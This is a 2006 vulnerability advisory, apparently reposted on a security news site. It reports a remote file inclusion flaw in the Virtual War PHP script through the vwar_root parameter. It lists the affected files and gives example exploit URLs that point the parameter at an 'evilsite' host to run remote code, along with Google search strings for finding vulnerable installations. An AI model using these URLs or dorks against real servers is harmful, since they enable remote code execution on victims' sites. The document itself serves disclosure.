Computer Security

Security Advisory: Virtual War File İnclusion
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Web+ Shop 5.0 XSS vuln.

  Matt Wright Guestbook Xss Script İnjection

  Autonomous LAN party File iNclusion

  Shadowed Portal Cross Site Scripting

From::) :) <liz0_(at)_bsdmail.com>
Date:09.04.2006
Subject:Virtual War File İnclusion

Virtual War File İnclusion
---------------------------------
Site:http://www.vwar.de/
Demo:http://www.vwar.de/demo/

---------------------------------------
File İnclusion


// get functions
$vwar_root = "./";

require ($vwar_root . "includes/functions_common.php");
require ($vwar_root . "includes/functions_front.php");


Vwar_root parameter File inclusion

Aut File

war.php,stats.php,news.php,joinus.php,challenge.php,calendar.php,member.php,
popup.php

and

all admin folder files

---------------------------------------
example

1)

http://victim.com/path/admin/admin.php?vwar_root=http://evilsite

2)(phpnuke module)

http://victim.com/path/modules/vwar/admin/admin.php?vwar_root=http://evilsite


-----------------------------------------
Credit:Liz0ziM
E-mail:liz0@bsdmail.com
Site:www.biyo.tk www.biyosecurity.be

-----------------------------------------
google:

"Powered by: Virtual War v1.5.0"

inurl:"modules.php?name=vwar"

-------------------------------------

Source:
http://www.blogcu.com/Liz0ziM/431925/
http://liz0zim.no-ip.org/vwar.txt









About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server